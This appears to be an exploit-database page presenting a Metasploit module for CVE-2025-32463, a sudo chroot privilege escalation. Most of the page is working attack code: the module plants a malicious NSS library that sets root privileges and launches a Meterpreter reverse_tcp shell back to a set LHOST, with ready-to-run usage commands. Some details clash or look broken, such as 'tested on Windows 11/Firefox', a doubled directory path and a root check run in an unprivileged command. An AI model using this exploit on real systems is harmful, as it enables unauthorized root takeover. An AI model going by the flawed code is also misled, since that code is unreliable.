Vulners
Lucene search
📄 sudo 1.9.17 chroot Privilege Escalation
10
=============================================================================================================================================
| # Title : sudo 1.9.17 Sudo Chroot Privilege Escalation |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://www.sudo.ws/ |
=============================================================================================================================================
[+] Summary :
This Metasploit module exploits CVE-2025-32463, a local privilege escalation vulnerability in Sudo's chroot functionality.
The vulnerability allows attackers to load malicious NSS (Name Service Switch) modules from within a chroot environment, leading to arbitrary code execution as root.
[+] Integration Methods :
1. **Standalone Exploit Module**
- Custom Ruby module for direct exploitation
- Automated chroot environment setup
- Payload execution as root
2. **Payload Integration**
- Modified NSS module with Meterpreter payload
- Reverse TCP connection establishment
- Root-level Meterpreter session
3. **Multi-Handler Approach**
- External exploit triggering Meterpreter
- Payload delivery via HTTP/SMB
- Session management through handler
[+] Module Components :
**Core Functions:**
- `check()`: Verifies sudo chroot capability
- `exploit()`: Main exploitation routine
- `generate_nss_module()`: Creates malicious NSS library
- `compile_nss_module()`: Compiles shared object
**Exploitation Flow:**
1. Vulnerability verification
2. Chroot environment creation
3. Malicious NSS module generation
4. Payload integration
5. Privilege escalation trigger
6. Meterpreter session establishment
[+] Usage :
use exploit/linux/local/sudo_chroot_priv_esc
set SESSION 1
set LHOST 192.168.1.100
set LPORT 4444
exploit
or
save as : sudo_chroot_exploit.rb
use exploit/multi/handler
set PAYLOAD linux/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.100
set LPORT 4444
set ExitOnSession false
exploit -j
[+] POC :
##
# Module for CVE-2025-32463 Sudo Chroot Privilege Escalation
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Post::File
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Sudo Chroot NSS Privilege Escalation (CVE-2025-32463)',
'Description' => %q{
This module exploits CVE-2025-32463, a privilege escalation vulnerability
in sudo's chroot functionality that allows loading malicious NSS modules.
},
'License' => MSF_LICENSE,
'Author' => ['indoushka'],
'References' => [
['CVE', '2025-32463']
],
'Platform' => ['linux'],
'Arch' => [ARCH_X64, ARCH_X86],
'SessionTypes' => ['shell', 'meterpreter'],
'Targets' => [['Automatic', {}]],
'DefaultOptions' => {
'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',
'PrependSetuid' => true
},
'DisclosureDate' => '2025-11-26',
'DefaultTarget' => 0
))
register_options([
OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
])
end
def check
if command_exists?('sudo')
check_cmd = 'sudo -n -l | grep -i chroot'
result = cmd_exec(check_cmd)
if result =~ /chroot/
return Exploit::CheckCode::Appears
else
return Exploit::CheckCode::Safe
end
else
return Exploit::CheckCode::Safe
end
end
def exploit
working_dir = "#{datastore['WritableDir']}/.chroot_exploit"
cmd_exec("mkdir -p #{working_dir}/#{working_dir}/{lib,etc,bin}")
nss_payload = generate_nss_module
nsswitch_conf = "passwd: Xfiles\ngroup: files\nshadow: files\n"
write_file("#{working_dir}/etc/nsswitch.conf", nsswitch_conf)
if compile_nss_module(working_dir, nss_payload)
print_status("Malicious NSS module compiled successfully")
print_status("Triggering privilege escalation...")
cmd_exec("sudo -R #{working_dir} /bin/id")
whoami = cmd_exec('whoami')
if whoami =~ /root/
print_good("Successfully obtained root privileges!")
print_status("Executing payload as root...")
cmd_exec("/bin/bash -c \"#{payload.encoded}\"")
else
print_error("Privilege escalation failed")
end
else
print_error("Failed to compile NSS module")
end
cmd_exec("rm -rf #{working_dir}")
end
def generate_nss_module
payload_file = "/tmp/.msf_payload"
write_file(payload_file, payload.encoded)
cmd_exec("chmod +x #{payload_file}")
nss_code = %Q{
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <nss.h>
#include <pwd.h>
__attribute__((constructor)) void init() {
unsetenv("LD_PRELOAD");
setuid(0);
setgid(0);
system("#{payload_file} &");
system("rm -f #{payload_file}");
}
enum nss_status _nss_Xfiles_getpwnam_r(const char *name, struct passwd *pwd,
char *buf, size_t buflen, int *errnop) {
return NSS_STATUS_NOTFOUND;
}
}
return nss_code
end
def compile_nss_module(working_dir, source_code)
source_file = "#{working_dir}/payload.c"
output_file = "#{working_dir}/lib/libnss_Xfiles.so.2"
write_file(source_file, source_code)
compile_cmd = "gcc -fPIC -shared -o #{output_file} #{source_file} -nostartfiles"
result = cmd_exec(compile_cmd)
# Cleanup source
cmd_exec("rm -f #{source_file}")
return file_exist?(output_file)
end
def command_exists?(cmd)
result = cmd_exec("which #{cmd}")
return result.include?('/')
end
end
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
23 Feb 2026 00:00Current
6.4Medium risk
Vulners AI Score6.4
CVSS 3.17.8 - 9.3
EPSS0.57345
SSVC